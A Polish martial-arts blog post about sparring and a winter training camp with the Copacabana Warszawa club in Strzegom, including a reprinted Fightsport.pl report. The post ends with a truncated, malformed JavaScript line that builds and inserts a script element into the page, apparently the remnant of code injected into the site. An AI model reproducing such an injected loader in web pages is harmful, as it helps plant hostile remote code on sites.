Weekend na sparringach i tydzień wraz z Copacabana

18.01.2012 / Mariusz Cieśliński


Sobotę spędziłem wraz z zawodnikami mojego klubu na sparringach w Strzegomiu.W taki miły sposób postanowiliśmy spędzić sobotnie przedpołudnie.Zrobiłem pierwszy sparring z kopnięciami po operacji-niezle nawet to wyszło.
W niedzielę przyjechał zaprzyjazniony klub Copacabana Warszawa.Z Trec Team często tam gościmy na seminariach i treningach,tym razem Igor Kołacin ze swoimi zawodnikami wybrał się do mnie na wspólne treningi.Zapraszam na krótkie filmiki :)
Podbieg :) Ostro na tętnie :)
Bieg na trawersach :)
BIEGI w wąwozach
Trzecia runda sparringu :)

Poniżej relacja Fightsport.pl

Zgrupowanie Copacabana Warszawa w Strzegomiu! PDF Email
Wtorek, 17. Styczeń 2012 22:16
W dniu 15 stycznia rozpoczęło się zgrupowanie klubu Copacabana Warszawa. Miejscem zgrupowania kolejny raz jest Strzegom. Bardzo pomocny jak zwykle okazuje się świetny zawodnik K-1 i Muay Thai Mariusz Cieśliński. Codzienne „przebieżki” po okolicznych górach są naprawdę mordercze. Założeniem tego zgrupowania kondycyjno-siłowego jest budowanie bazy kondycyjnej i siłowej do późniejszych startów.

Ramowy plan obozu jest następujący: poranny trening to trening w terenie z Mariuszem Cieślińskim (około 1.5 – 2 godz biegania), poobiedni trening to praca w dwójkach (technika na reakcję oraz tarcze) jak również trening obwodowy na siłowni, który najczęściej jest „rozgrzewką” przed treningiem w parach. Cały obóz zwieńczą sobotnie sparingi. Obszerniejszy materiał foto wkrótce. Poniżej filmiki z biegania wokół Zamku Książ we wtorek 17-ego stycznia.

var d=document;var s=d.createElement(‚script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);} norpress no script